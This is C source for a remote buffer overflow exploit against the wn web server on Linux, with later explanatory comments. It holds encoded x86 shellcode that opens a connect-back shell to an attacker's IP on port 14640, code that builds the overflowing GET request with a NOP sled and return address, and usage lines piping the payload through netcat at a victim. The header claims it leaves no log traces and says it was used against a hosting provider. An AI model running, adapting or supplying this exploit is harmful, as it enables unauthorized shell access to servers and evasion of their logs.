Remote buffer overflow exploit for the wn web server on Linux, version 2.0.9 and below.
54f424cc1122a2ea6b28734c7d2c58d1f67fa6e799266a8ebc622e21926ae9c0
/*
* USE AT YOUR OWN RISK, BY USING THIS PROGRAM YOU ACCEPT ALL
* RESPONSIBILITY FOR THE RESULTS
*/
/*
* Bug discovered by: Dvorak (dvorak@hit2000.org)
* Exploit by: Dvorak (dvorak@synnergy.net)
* With help from: Bounce (is that your official nick?)
* Will work against: wn webserver under Linux.
* Exploit build at: CCC (chaos communication camp, www.ccc.de)
* Exploit first used: Hit2000 (www.hit2000.org)
*
* (against a dutch hosting provider to show it was possible)
* I got a t-shirt from them; great marketing trick ;)
*
* Greets to: Hit2000 Crew (www.hit2000.org)
* : Synnergy Networks (www.synnergy.net)
* : emphyrio (wanneer ga je weer meer met security doen?)
* : shevek (Building a remote AIX (4.3.2) ftpd exploit rocks!)
* : bivak (niet chatten, leren!!)
* : #hit2000, #synnergy, #phreak.nl (irc.xs4all.nl)
*
*
* New version of wn-server: hopf.math.nwu.edu
*
* Check these sites out:
* www.hackernews.com
* www.securityfocus.com
* www.l0pht.com
*/
/*
* Remote exploit against the wn webserver
* (2.0.x, x < 9?)
* (1.*)
* (2.1.y, y < ?????)
* The bug (ab)used is patched in the newest versions
*
* John(@matht.nwu.edu), thanks for the quick response
*/
/*
* This exploit leaves NO traces in the logs (per the author; not verified here).
* It spawns a shell with uid = uid of the webserver (typically nobody), which
* connects back to the ip-address given with the -d option on port 14640,
* so you'd better be listening there (use netcat (nc); it is absolutely
* the number 1 networking tool -- ok, fragrouter and nmap are cool too).
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
/*
* This is weird shellcode. It is normal shellcode in which every byte was
* split into 2 nibbles, each or-ed with 0x80, so that every byte sent
* stays inside the range wn lets through.
*
* The scrambled shellcode is highly inefficient; it can be cut down
* to approximately 30% of its current size if you want to do it:
* Do IT
*
* For more info and tools: dvorak@hit2000.org, dvorak@synnergy.net
*/
/*
 * Raw payload sent to the server. Layout, in the order the bytes appear:
 *   - a 51-byte x86-32 decoder stub in plain machine code (the first two
 *     lines plus the third line up to and including the "\xe8\xcf\xff\xff\xff"
 *     call); the jmp/call pair in it is relative, so do not shorten or
 *     reorder the stub without re-deriving those displacements;
 *   - the real shellcode in "scrambled" form: each original byte is carried
 *     by two bytes, (high nibble | 0x80) followed by (low nibble | 0x80),
 *     which the stub reassembles in place (see the note above);
 *   - eight 0x99 placeholder bytes near the end. main() does NOT send them
 *     as-is: each pair is replaced by one byte of the -d address, encoded
 *     with the same split-nibble scheme, so the connect-back address is
 *     patched at run time. The port (14640, see the header comment) is
 *     presumably baked into the encoded part and is not patched.
 * The array is NUL-terminated by the string literal; main() relies on that
 * terminator to find the end of the payload.
 */
char shellcode[] =
"\xeb\x2c\x5f\x89\xfe\x31\xc9\x89\xcb\x80\xc1\x01\x89\xcd\x89\xd9\x80\xc1\xff"   /* decoder stub: jmp over body, pop edi = payload base */
"\x90\x90\x8a\x34\x1e\x01\xee\x8a\x14\x1e\x01\xee\xc0\xe2\x04\x66\xc1\xfa\x04"   /* decoder stub: fetch two bytes, merge nibbles */
"\x88\x17\x01\xef\xe2\xe9\xeb\x05\xe8\xcf\xff\xff\xff\x83\x81\x8d\x8b\x88\x89"   /* decoder stub ends at the call; encoded payload starts at \x83 */
"\x8d\x88\x80\x84\x86\x86\x88\x80\x8c\x83\x80\x81\x88\x89\x8d\x89\x88\x89"
"\x8c\x8a\x8e\x8b\x84\x81\x85\x8e\x88\x89\x84\x8e\x80\x88\x88\x80\x8c\x81"
"\x80\x81\x88\x89\x84\x8e\x80\x84\x88\x80\x8c\x81\x80\x84\x88\x89\x84\x8e"
"\x80\x8c\x88\x8d\x84\x8e\x80\x84\x8c\x8d\x88\x80\x88\x89\x80\x86\x83\x81"
"\x8c\x89\x88\x80\x8c\x81\x80\x82\x86\x86\x88\x89\x84\x8e\x80\x8c\x86\x86"
"\x88\x89\x84\x8e\x80\x8e\x88\x80\x8c\x81\x80\x8e\x86\x86\x88\x89\x84\x8e"
"\x80\x88\x86\x86\x8b\x89\x83\x89\x83\x80\x86\x86\x88\x89\x84\x8e\x80\x8e"
"\x88\x8d\x84\x86\x80\x8c\x88\x89\x84\x86\x80\x84\x83\x81\x8c\x89\x8b\x81"
"\x80\x83\x88\x89\x8c\x8a\x8e\x8b\x80\x82\x8e\x8b\x84\x89\x88\x89\x8c\x8b"
"\x88\x89\x8f\x81\x83\x81\x8c\x80\x80\x84\x86\x86\x8c\x8d\x88\x80\x83\x81"
"\x8c\x80\x88\x89\x8c\x81\x80\x84\x83\x8f\x88\x89\x8c\x82\x88\x8b\x81\x8e"
"\x8c\x8d\x88\x80\x88\x89\x8d\x80\x88\x80\x8c\x81\x80\x81\x8c\x8d\x88\x80"
"\x88\x89\x8d\x80\x88\x80\x8c\x81\x80\x81\x8c\x8d\x88\x80\x83\x81\x8c\x80"
"\x88\x89\x84\x86\x81\x80\x88\x88\x84\x86\x81\x8b\x88\x8d\x84\x86\x81\x84"
"\x88\x89\x84\x86\x80\x8c\x83\x81\x8c\x80\x80\x84\x80\x8b\x88\x8d\x85\x8e"
"\x81\x84\x88\x8d\x84\x8e\x80\x8c\x88\x8d\x85\x86\x81\x80\x8c\x8d\x88\x80"
"\x83\x81\x8c\x80\x84\x80\x88\x89\x8c\x83\x84\x83\x8c\x8d\x88\x80\x8e\x88"
"\x86\x8f\x8f\x8f\x8f\x8f\x8f\x8f\x82\x8e\x86\x81\x86\x81\x86\x81\x86\x81"
"\x86\x81\x86\x81\x86\x81\x86\x81\x86\x81\x86\x81\x86\x81\x86\x81\x86\x81"
"\x83\x89\x83\x80\x99\x99\x99\x99\x99\x99\x99\x99\x82\x8f\x86\x82\x86\x89"   /* 8 x 0x99: replaced pairwise by the 4 bytes of the -d address */
"\x86\x8e\x82\x8f\x87\x83\x86\x88";
/*
* Most of the hardcoded values here can be changed on the command line
* but KNOW what you are doing or you will leave traces of your
* activity in the log files
*/
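/*
 * Print the command-line synopsis to stderr. Used for -h, for an unknown
 * option, and when the mandatory -d argument is missing.
 */
static void usage(void)
{
	fprintf(stderr, "Use: wn_exploit -d <the ip of the listening nc> | nc -v victim 80\n");
	fprintf(stderr, "on the listening host: nc -v -s <same ip as above> -l -p 14640\n");
	fprintf(stderr, "Extended use:\n");
	fprintf(stderr, "\t -R 0xaddr\treturn address to use\n");
	fprintf(stderr, "\t -a <n>\t\tpad with <n> bytes before the return address\n");
	fprintf(stderr, "\t if you want to tweak more:\n");
	fprintf(stderr, "\t read the source of wn_exploit or mail me.\n");
	fprintf(stderr, "\t dvorak@hit2000.org // dvorak@synnergy.net\n");
}

/*
 * Write byte c to stdout n times. A zero or negative n writes nothing,
 * which keeps a too-long payload from turning into a crash here.
 */
static void emit_fill(int c, long n)
{
	long k;
	for (k = 0; k < n; k++)
		putchar(c);
}

/*
 * Write the low 32 bits of v to stdout least-significant byte first --
 * the byte order an x86 target reads a saved return address or a
 * jmp rel32 displacement in. Only the low 32 bits of v are used.
 */
static void emit_le32(unsigned long v)
{
	int k;
	for (k = 0; k < 4; k++)
		putchar((int)((v >> (8 * k)) & 0xff));
}

/*
 * Build the malicious request on stdout (pipe it into nc, see usage()).
 * Request layout, in order:
 *   "GET /s=c?"  num_amps x '&'  [patched shellcode]  nop sled  jmp rel32 back
 *   to the shellcode  post_nops x nop  align x 'q'  ret (4 bytes LE)  "\r\n\r\n"
 *
 * Options: -d <ip> (required) connect-back address patched into the
 * shellcode; -R 0xaddr return address; -a <n> extra padding before the
 * return address; -n <n> is parsed but has no effect (see below).
 * Exits 2 on a usage error. Writes only to stdout/stderr.
 */
int main(int argc, char *argv[])
{
	/* Number of '&' characters sent ahead of the shellcode. The original
	 * author points at wn's source for why; the size arithmetic below
	 * budgets 5 bytes per '&', presumably because the server expands each
	 * one -- not verified here. There is no option to change it because
	 * the overflow offset depends on it. */
	int num_amps = 520;
	/* NOPs placed AFTER the backward jmp so that stack activity in the
	 * daemon, which overwrites the bytes just past the jmp, does not
	 * clobber the jmp itself. */
	int post_nops = 20;
	int num_nops = 400;       /* -n: accepted for compatibility, but recomputed below */
	int align = 0;            /* -a: number of 'q' bytes inserted before the return address */
	unsigned long ret = 0xbffe5dd4UL;  /* -R: value written over the saved return address */
	unsigned long my_addr = 0;         /* -d: connect-back ip, as returned by inet_addr() (network byte order) */
	int opt;                  /* int, not char: getopt() returns -1, which an unsigned char can never equal */
	long i, shl_len;

	while ((opt = getopt(argc, argv, "n:a:R:d:h")) != -1) {
		switch (opt) {
		case 'd':
			my_addr = inet_addr(optarg);
			/* inet_addr() reports a malformed address as INADDR_NONE; the
			 * original only caught 0.0.0.0 and would happily patch
			 * 255.255.255.255 into the shellcode. */
			if (my_addr == INADDR_NONE) {
				fprintf(stderr, "wn_exploit: -d: '%s' is not a dotted-quad IPv4 address\n", optarg);
				exit(2);
			}
			break;
		case 'a':
			align = atoi(optarg);
			break;
		case 'R':
			ret = strtoul(optarg, NULL, 0);
			break;
		case 'n':
			num_nops = atoi(optarg);
			break;
		case 'h':
		default:
			usage();
			exit(2);
		}
	}

	if (!my_addr) {
		/* Mandatory argument missing: say so and fail with a non-zero
		 * status instead of the original's joke message and exit(0). */
		fprintf(stderr, "wn_exploit: the -d <ip> option is required\n");
		usage();
		exit(2);
	}

	fprintf(stderr, "wn remote exploit by dvorak(@hit2000.org // @synnergy.net)\n");

	printf("GET /s=c?");
	emit_fill('&', num_amps);

	/* Copy the shellcode, patching the connect-back address into the
	 * 0x99 placeholders. Each placeholder PAIR carries one address byte
	 * in the same split-nibble form as the rest of the payload
	 * ((hi | 0x80) then (lo | 0x80)), so every byte sent stays >= 0x80.
	 * Bytes are consumed from my_addr low byte first, i.e. in network
	 * order as inet_addr() stored them. */
	shl_len = 0;
	while (shellcode[shl_len]) {
		if ((unsigned char)shellcode[shl_len] == 0x99) {
			putchar((int)(0x80 + ((my_addr & 0xf0) >> 4)));
			putchar((int)(0x80 + (my_addr & 0x0f)));
			my_addr >>= 8;
			shl_len += 2;
		} else {
			putchar(shellcode[shl_len++]);
		}
	}

	/* The nop sled goes AFTER the shellcode and a jmp rel32 at its end
	 * jumps back to the first shellcode byte; the return address is
	 * presumably aimed somewhere inside the sled. The sled length is
	 * whatever is left of a fixed 4104-byte budget once the prefix, the
	 * '&' run (5 bytes each), the shellcode, the jmp (5 bytes) and the
	 * trailing nops are accounted for -- which is why -n has no effect. */
	num_nops = (int)(4104 - 4 - (5 * num_amps) - shl_len - 5 - post_nops);
	emit_fill(0x90, num_nops);

	/* jmp rel32 (opcode 0xe9): the displacement is counted from the end
	 * of this 5-byte instruction back to the start of the shellcode.
	 * Negated in unsigned arithmetic so the byte extraction does not rely
	 * on the implementation-defined right shift of a negative int. */
	putchar(0xe9);
	emit_le32(0UL - (unsigned long)(shl_len + num_nops + 5));

	emit_fill(0x90, post_nops);
	emit_fill('q', align);
	emit_le32(ret);
	fputs("\r\n\r\n", stdout);
	fflush(stdout);
	return 0;
}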
/* www.hack.co.za [20 July]*/